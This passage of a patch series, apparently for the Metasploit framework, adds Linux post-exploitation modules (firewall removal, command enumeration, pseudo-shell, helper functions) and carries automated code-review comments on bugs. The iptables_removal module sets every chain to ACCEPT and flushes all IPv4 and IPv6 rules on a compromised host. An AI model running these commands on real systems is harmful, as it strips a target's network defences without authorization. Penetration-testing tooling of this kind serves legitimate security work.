+ cmd_exec("iptable -t mangle -F")
+ cmd_exec("iptables -F")
+ cmd_exec("iptables -X")
+
+ print_good("Deleting IP6TABLES rules...")
+ cmd_exec("ip6tables -P INPUT ACCEPT")
+ cmd_exec("ip6tables -P FORWARD ACCEPT")
+ cmd_exec("ip6tables -P OUTPUT ACCEPT")
+ cmd_exec("ip6tables -t nat -F")
+ cmd_exec("ip6table -t mangle -F")
+ cmd_exec("ip6tables -F")
+ cmd_exec("ip6tables -X")
+
+ print_good("Module successfully executed.")
+ end
+end
From 259b92a64b60f1a2957d21dc758fb3ae9ff35af6 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 18:24:15 +0200 Subject: [PATCH 12/21] iptables_removal.rb module added --- modules/post/linux/manage/iptables_removal.rb | 44 +++++++++++-------- 1 file changed, 26 insertions(+), 18 deletions(-)
diff --git a/modules/post/linux/manage/iptables_removal.rb b/modules/post/linux/manage/iptables_removal.rb
index eacd4f0cd392..bfbbffcdfada 100644
--- a/modules/post/linux/manage/iptables_removal.rb
+++ b/modules/post/linux/manage/iptables_removal.rb
@@ -21,24 +21,32 @@ def initialize
 end
 def run
- print_good("Deleting IPTABLES rules...")
- cmd_exec("iptables -P INPUT ACCEPT")
- cmd_exec("iptables -P FORWARD ACCEPT")
- cmd_exec("iptables -P OUTPUT ACCEPT")
- cmd_exec("iptables -t nat -F")
- cmd_exec("iptable -t mangle -F")
- cmd_exec("iptables -F")
- cmd_exec("iptables -X")
- print_good("Deleting IP6TABLES rules...")
- cmd_exec("ip6tables -P INPUT ACCEPT")
- cmd_exec("ip6tables -P FORWARD ACCEPT")
- cmd_exec("ip6tables -P OUTPUT ACCEPT")
- cmd_exec("ip6tables -t nat -F")
- cmd_exec("ip6table -t mangle -F")
- cmd_exec("ip6tables -F")
- cmd_exec("ip6tables -X")
-
- print_good("Module successfully executed.")
+ if command_exists?("iptables")
+ print_good("Deleting IPTABLES rules...")
+ cmd_exec("iptables -P INPUT ACCEPT")
+ cmd_exec("iptables -P FORWARD ACCEPT")
+ cmd_exec("iptables -P OUTPUT ACCEPT")
+ cmd_exec("iptables -t nat -F")
+ cmd_exec("iptables -t mangle -F")
+ cmd_exec("iptables -F")
+ cmd_exec("iptables -X")
+ print_good("iptables rules successfully executed")
+ else
+ print_line("iptables rules could not be executed")
+ end
+ if command_exists?("ip6tables")
+ print_good("Deleting IP6TABLES rules...")
+ cmd_exec("ip6tables -P INPUT ACCEPT")
+ cmd_exec("ip6tables -P FORWARD ACCEPT")
+ cmd_exec("ip6tables -P OUTPUT ACCEPT")
+ cmd_exec("ip6tables -t nat -F")
+ cmd_exec("ip6table -t mangle -F")
+ cmd_exec("ip6tables -F")
+ cmd_exec("ip6tables -X")
+ print_good("ip6tables rules successfully executed")
+ else
+ print_line("ip6tables rules could not be executed")
+ end
 end
 end
From 75ef8e8097e37ae1933ec2b03373ef7023a837ca Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 18:31:16 +0200 Subject: [PATCH 13/21] enum_commands.rb module added --- modules/post/linux/gather/enum_commands.rb | 85 ++++++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 modules/post/linux/gather/enum_commands.rb
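Review bot: `print_good("iptables rules successfully executed")` is printed whatever the seven preceding `cmd_exec` calls returned, and the `else` message `"iptables rules could not be executed"` is shown when the binary is simply absent, so neither string describes what happened; a non-root session — the module has no privilege check — fails every call and is still reported as success. Capturing the output of the calls (`out = cmd_exec("iptables -F")`) and printing it with `print_error` when non-empty, with messages like `"iptables rules flushed"` / `"iptables not found"`, would make the status trustworthy. The `ip6table -t mangle -F` typo (missing `s`) survives in the IPv6 block of this revision while the IPv4 copy is fixed.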
diff --git a/modules/post/linux/gather/enum_commands.rb b/modules/post/linux/gather/enum_commands.rb new file mode 100644 index 000000000000..7a35f82e1251 --- /dev/null +++ b/modules/post/linux/gather/enum_commands.rb 
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::File
+ include Msf::Post::Linux::System
+
+ def initialize
+ super(
+ 'Name' => 'Testing commands needed in a function',
+ 'Description' => %q{
+ This module will be applied on a session connected to a shell. It will check which commands are available in the system.
+ },
+ 'Author' => 'Alberto Rafael Rodriguez Iglesias ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['linux'],
+ 'SessionTypes' => ['shell']
+ )
+ register_options(
+ [
+ OptString.new('DIR', [false, 'Optional directory name to list, default current session path',''])
+ ])
+ end
+
+ DIRS = [
+ "/root/local/bin/",
+ "/usr/local/sbin/",
+ "/usr/local/bin/",
+ "/usr/sbin/",
+ "/usr/bin/",
+ "/sbin/",
+ "/bin/",
+ "/usr/local/go/bin/"
+ ]
+
+ def run
+ dir = datastore['DIR']
+ binaries = []
+
+ # Explore the $PATH directories
+ path_dirs = cmd_exec("echo $PATH").split(':')
+ path_dirs.each do |d|
+ elems = dir(d)
+ path = pwd()
+ elems.each do |elem|
+ binaries.insert(-1, "#{d}/#{elem}")
+ end
+ end
+
+ # Explore common directories with binaries:
+ DIRS.each do |d|
+# if dir_exist?(d)
+ elems = dir(d)
+ path = pwd()
+ elems.each do |elem|
+ binaries.insert(-1, "#{d}#{elem}")
+ end
+ end
+
+ # Busybox commands
+ if command_exists?("busybox")
+ output = cmd_exec("busybox")
+ busybox_cmds = output.split(':')[-1].chomp.split(',')
+ busybox_cmds.each do |cmd|
+ binaries.insert(-1, "busybox #{cmd}")
+ print_good("busybox #{cmd}")
+ end
+ elsif command_exists?("/bin/busybox")
+ output = cmd_exec("(bin/busybox")
+ end
+
+# A recursive ls through the whole system could be added to find extra binaries
+
+ binaries.uniq
+ binaries.sort
+
+ print_good("The following binaries/commands are available")
+ binaries.each do |bin|
+ print_line("#{bin}")
+ end
+
+ end
+end
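Review bot: `binaries.uniq` and `binaries.sort` are non-destructive and their results are discarded, so the printed list keeps duplicates and PATH order; `binaries = binaries.uniq.sort` fixes both lines. The `elsif command_exists?("/bin/busybox")` branch runs `cmd_exec("(bin/busybox")` — a stray `(` and a missing leading `/` — and never uses its output, while the first branch both appends to `binaries` and prints each applet, so busybox entries appear twice in the output. The `DIR` option and the `dir`/`path` locals are copied from the ls module and unused, the `# if dir_exist?(d)` guard is commented out so a missing entry in `DIRS` is listed blindly, and `"/root/local/bin/"` is presumably meant to be something else (`/usr/local/bin/` is already listed) — worth confirming. `print_line("#{bin}")` is `print_line(bin)`.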
From 9bf7bec870f8f9b494c3761037c845cf90e7e7a4 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 19:14:15 +0200 Subject: [PATCH 14/21] Multiple functions to simulate native commands added --- lib/msf/core/post/linux/priv.rb | 113 +++++++++++++++++++++++++++++++- 1 file changed, 111 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb index a628db835964..f251bb64fbb3 100644 --- a/lib/msf/core/post/linux/priv.rb +++ b/lib/msf/core/post/linux/priv.rb 
@@ -20,17 +20,126 @@ def is_root? end return clean_user_id.match(/^0$/) ? true : false end - user = whoami data = cmd_exec('while read line; do echo $line; done #{local_path}` + end + + def touch_cmd(new_path_file) + cmd_exec("> #{new_path_file}") + end + + def cp_cmd(origin_file, final_file) + file_origin = read_file(origin_file) + cmd_exec("echo '#{file_origin}' > #{final_file}") + end + + def pids() + dir_proc = "/proc/" + pids = [] + + directories_proc = dir(dir_proc) + directories_proc.each do |elem| + elem.gsub( / *\n+/, "") + if elem[-1] == '1' || elem[-1] == '2' || elem[-1] == '3' || elem[-1] == '4' || elem[-1] == '5' || elem[-1] == '6' || elem[-1] == '7' || elem[-1] == '8' || elem[-1] == '9' || elem[-1] == '0' + pids.insert(-1, elem) + end + end + + return pids.sort_by(&:to_i) + end + + def binary_of_pid(pid) + binary = read_file("/proc/#{pid}/cmdline") + if binary == "" #binary.empty? + binary = read_file("/proc/#{pid}/comm") + end + if binary[-1] == "\n" + binary = binary.split("\n")[0] + end + return binary + end + + def seq(first, increment, last) + result = [] + (first..last).step(increment) do |i| + result.insert(-1, i) + end + return result + end + + def wc_cmd(file) + [nlines_file(file), nwords_file(file), nchars_file(file), file] + end + + def nchars_file(file) + nchars = 0 + lines = read_file(file).split("\n") + nchars = lines.length() + lines.each do |line| + line.gsub(/[ ]/, ' ' => '') + nchars_line = line.length() + nchars = nchars + nchars_line + end + return nchars + end + + def nwords_file(file) + nwords = 0 + lines = read_file(file).split("\n") + lines.each do |line| + words = line.split(" ") + nwords_line = words.length() + nwords = nwords + nwords_line + end + return nwords + end + + def nlines_file(file) + lines = read_file(file).split("\n") + nlines = lines.length() + return nlines + end + + def head_cmd(file, nlines) + lines = read_file(file).split("\n") + result = lines[0..nlines-1] + return result + end + + def tail_cmd(file, 
nlines) + lines = read_file(file).split("\n") + result = lines[-1*(nlines)..-1] + return result + end + + def grep_cmd(file, string) + result = [] + lines = read_file(file).split("\n") + + lines.each do |line| + if line.include?(string) + result.insert(-1, line) + end + end + return result + end + + + end # Priv end # Linux end # Post From e43798b148974869838663391f8cd3f6d1f5f9e3 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 19:21:43 +0200 Subject: [PATCH 15/21] minor fix --- modules/post/linux/manage/iptables_removal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/linux/manage/iptables_removal.rb b/modules/post/linux/manage/iptables_removal.rb index bfbbffcdfada..56fe26bd5f4a 100644 --- a/modules/post/linux/manage/iptables_removal.rb +++ b/modules/post/linux/manage/iptables_removal.rb @@ -41,7 +41,7 @@ def run cmd_exec("ip6tables -P FORWARD ACCEPT") cmd_exec("ip6tables -P OUTPUT ACCEPT") cmd_exec("ip6tables -t nat -F") - cmd_exec("ip6table -t mangle -F") + cmd_exec("ip6tables -t mangle -F") cmd_exec("ip6tables -F") cmd_exec("ip6tables -X") print_good("ip6tables rules successfully executed") From 8e109b4f20601adc9144cf28f3654d755219712a Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 19:25:20 +0200 Subject: [PATCH 16/21] Some minor fixes --- lib/msf/core/post/linux/priv.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb index f251bb64fbb3..76cebe88ca40 100644 --- a/lib/msf/core/post/linux/priv.rb +++ b/lib/msf/core/post/linux/priv.rb @@ -30,7 +30,7 @@ def is_root? end # -# Multiple function for simulate native commands +# Multiple functions to simulate native commands added # def download_cmd(remote_path, local_path) From bb24c3114a16dcc096ff2172841794695847f56a Mon Sep 17 00:00:00 2001 
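Review bot: `cp_cmd` rebuilds the file with `cmd_exec("echo '#{file_origin}' > #{final_file}")`, which breaks on any single quote in the content, on content larger than the shell's argument limit, and on shells whose `echo` interprets escapes; `Msf::Post::File` already has a platform-agnostic writer, so `write_file(final_file, read_file(origin_file))` is both shorter and faithful. Several results are silently discarded: `elem.gsub( / *\n+/, "")` in `pids` and `line.gsub(/[ ]/, ' ' => '')` in `nchars_file` are non-bang calls whose return value is dropped, so they do nothing, and the ten-way `elem[-1] == '1' || …` test reads better as `elem =~ /\A\d+\z/`. `head_cmd(file, 0)` evaluates `lines[0..-1]` and returns the whole file, and `tail_cmd(file, 0)` does the same through `lines[-1*0..-1]`, so a count of 0 needs an explicit guard (`return [] if nlines <= 0`). `binary_of_pid` indexes `binary[-1]` on the result of `read_file`, which is `nil` for session types other than shell and meterpreter, and these file and process helpers sit in the `Priv` module although none of them concerns privileges. The body of `download_cmd` is cut in this rendering and is not reviewed here.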
From: AlbertoCoding Date: Wed, 15 Aug 2018 04:49:17 +0200 Subject: [PATCH 17/21] Minor code style fixes made --- modules/post/linux/gather/enum_commands.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/linux/gather/enum_commands.rb b/modules/post/linux/gather/enum_commands.rb index 7a35f82e1251..a5ec03e42b57 100644 --- a/modules/post/linux/gather/enum_commands.rb +++ b/modules/post/linux/gather/enum_commands.rb @@ -72,7 +72,7 @@ def run end # A recursive ls through the whole system could be added to find extra binaries - + binaries.uniq binaries.sort From 3bf4726b15a59b624a946da8847a42b7c94b295b Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 15 Jan 2019 14:34:29 -0600 Subject: [PATCH 18/21] Fix pid_uid --- lib/msf/core/post/linux/system.rb | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/lib/msf/core/post/linux/system.rb b/lib/msf/core/post/linux/system.rb index 26d60272032c..df4627ca6396 100644 --- a/lib/msf/core/post/linux/system.rb +++ b/lib/msf/core/post/linux/system.rb @@ -218,12 +218,9 @@ def pidof(program) # @return [String] # def pid_uid(pid) - file_pid = "/proc/" + pid.to_s + "/status" - result = read_file(file_pid) - return result + read_file("/proc/#{pid}/status").to_s end - # # Checks if `file_path` is mounted on a noexec mount point # @return [Boolean] From 8b6807254b9b20b619180e9d2a9603dafeab57dd Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 24 Jan 2019 10:57:53 -0600 Subject: [PATCH 19/21] Fix whoami --- lib/msf/core/post/linux/system.rb | 8 ++++++++ lib/msf/core/post/unix.rb | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/post/linux/system.rb b/lib/msf/core/post/linux/system.rb index 84d25da3670e..47c59686676a 100644 --- a/lib/msf/core/post/linux/system.rb +++ b/lib/msf/core/post/linux/system.rb 
@@ -207,6 +207,14 @@ def get_shell_pid
 cmd_exec("echo $$").to_s
 end
+ #
+ # Gets the pid of the current session
+ # @return [String]
+ #
+ def get_session_pid
+ cmd_exec("echo $PPID").to_s
+ end
+
 #
 # Checks if the system has gcc installed
 # @return [Boolean]
diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb
index b6abc48cfce0..78c10dbe602d 100644
--- a/lib/msf/core/post/unix.rb
+++ b/lib/msf/core/post/unix.rb
@@ -93,7 +93,7 @@ def enum_user_directories
 # @return [String] with username
 #
 def whoami
- shellpid = get_shell_pid()
+ shellpid = get_session_pid()
 statuspid = pid_uid(shellpid)
 statuspid.each_line do |line|
 split = line.split(":")
From 006faa3d177522d9e638a9ffc37817d4732898e6 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 24 Jan 2019 11:13:00 -0600
Subject: [PATCH 20/21] Fix prompt
---
 modules/post/linux/manage/pseudo_shell.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb
index 1d5378d70ebe..1b180a0c7d0a 100644
--- a/modules/post/linux/manage/pseudo_shell.rb
+++ b/modules/post/linux/manage/pseudo_shell.rb
@@ -38,9 +38,6 @@ class MetasploitModule < Msf::Post
 LIST.insert(-1, linea[0])
 end
-@vhostname = ""
-@vusername = ""
-
 def initialize
 super(
 'Name' => 'Pseudo-Shell Post-Exploitation Module',
@@ -57,6 +54,7 @@ def initialize
 def run
 @vhostname = get_hostname
 @vusername = whoami
+ @vpromptchar = is_root? ? '#' : '$'
 prompt()
 end
@@ -102,7 +100,7 @@ def help()
 end
 def prompt_show()
- promptshell = @vusername + "@" + @vhostname + ":" + pwd.strip() + "# "
+ promptshell = "#{@vusername}@#{@vhostname}:#{pwd.strip}#{@vpromptchar} "
 comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) }
 Readline.completion_append_character = " "
 Readline.completion_proc = comp
From 8cdcba81feee58e589835dbf9ea3ade7db248c7d Mon Sep 17 00:00:00 2001
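Review bot: The comment `# Gets the pid of the current session` does not say what `$PPID` actually resolves to: it is the parent of the shell in which `cmd_exec` runs the `echo`, which presumably differs between session types and is why `whoami` in the same commit moves to it from `get_shell_pid` (`$$`). Suggest spelling that out, e.g. `# Gets the pid of the process that spawned the command shell ($PPID); which process that is depends on the session type`. If `cmd_exec` does not already strip trailing newlines, `.to_s.strip` would also keep the value safe for the `/proc/#{pid}/status` interpolation in `pid_uid` — worth confirming against the session implementation.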
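Review bot: `shellpid = get_session_pid()` keeps empty call parentheses, which Ruby style omits (`shellpid = get_session_pid`), the same style point as the `get_shell_pid()` it replaces. Since `pid_uid` now returns `""` when the status file cannot be read, `statuspid.each_line` iterates zero times and `whoami` falls through to whatever follows; the hunk does not show a guard, so it is worth confirming the method does not hand nil to callers such as the pseudo_shell prompt. `whoami`'s body continues past the hunk.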
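Review bot: `promptshell = "#{@vusername}@#{@vhostname}:#{pwd.strip}#{@vpromptchar} "` places three values read from the compromised host (`whoami`, `get_hostname`, `pwd`) directly into the operator's Readline prompt, so a hostname or directory name containing control or escape characters would be rendered by the local terminal. Stripping non-printables where the values are assigned in `run`, e.g. `@vhostname = get_hostname.to_s.gsub(/[^[:print:]]/, '')` and likewise for `@vusername` and the `pwd` result, keeps the prompt to plain text. With the class-level defaults removed in the first hunk, `@vpromptchar` (and the other two ivars) are only set in `run`; if `prompt_show` can be reached before `run`, the prompt degrades to a bare `@:`, so a default in `initialize` would be safer.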
From: William Vu
Date: Thu, 24 Jan 2019 11:22:19 -0600
Subject: [PATCH 21/21] Fix SessionTypes
---
 modules/post/linux/gather/enum_commands.rb | 2 +-
 modules/post/linux/manage/dns_spoofing.rb | 2 +-
 modules/post/linux/manage/iptables_removal.rb | 2 +-
 modules/post/linux/manage/pseudo_shell.rb | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/modules/post/linux/gather/enum_commands.rb b/modules/post/linux/gather/enum_commands.rb
index a5ec03e42b57..b91614c234b4 100644
--- a/modules/post/linux/gather/enum_commands.rb
+++ b/modules/post/linux/gather/enum_commands.rb
@@ -16,7 +16,7 @@ def initialize
 'Author' => 'Alberto Rafael Rodriguez Iglesias ',
 'License' => MSF_LICENSE,
 'Platform' => ['linux'],
- 'SessionTypes' => ['shell']
+ 'SessionTypes' => ['shell', 'meterpreter']
 )
 register_options(
 [
diff --git a/modules/post/linux/manage/dns_spoofing.rb b/modules/post/linux/manage/dns_spoofing.rb
index d518a4a30cee..5731743846ad 100644
--- a/modules/post/linux/manage/dns_spoofing.rb
+++ b/modules/post/linux/manage/dns_spoofing.rb
@@ -16,7 +16,7 @@ def initialize
 'Author' => 'Alberto Rafael Rodriguez Iglesias ',
 'License' => MSF_LICENSE,
 'Platform' => ['linux'],
- 'SessionTypes' => ['shell']
+ 'SessionTypes' => ['shell', 'meterpreter']
 )
 register_options(
 [
diff --git a/modules/post/linux/manage/iptables_removal.rb b/modules/post/linux/manage/iptables_removal.rb
index 56fe26bd5f4a..11ab186502cd 100644
--- a/modules/post/linux/manage/iptables_removal.rb
+++ b/modules/post/linux/manage/iptables_removal.rb
@@ -16,7 +16,7 @@ def initialize
 'Author' => 'Alberto Rafael Rodriguez Iglesias ',
 'License' => MSF_LICENSE,
 'Platform' => ['linux'],
- 'SessionTypes' => ['shell']
+ 'SessionTypes' => ['shell', 'meterpreter']
 )
 end
diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb
index 1b180a0c7d0a..098210bf7719 100644
--- a/modules/post/linux/manage/pseudo_shell.rb
+++ b/modules/post/linux/manage/pseudo_shell.rb
@@ -47,7 +47,7 @@ def initialize
 'Author' => 'Alberto Rafael Rodriguez Iglesias ',
 'License' => MSF_LICENSE,
 'Platform' => ['linux'],
- 'SessionTypes' => ['shell']
+ 'SessionTypes' => ['shell', 'meterpreter']
 )
 end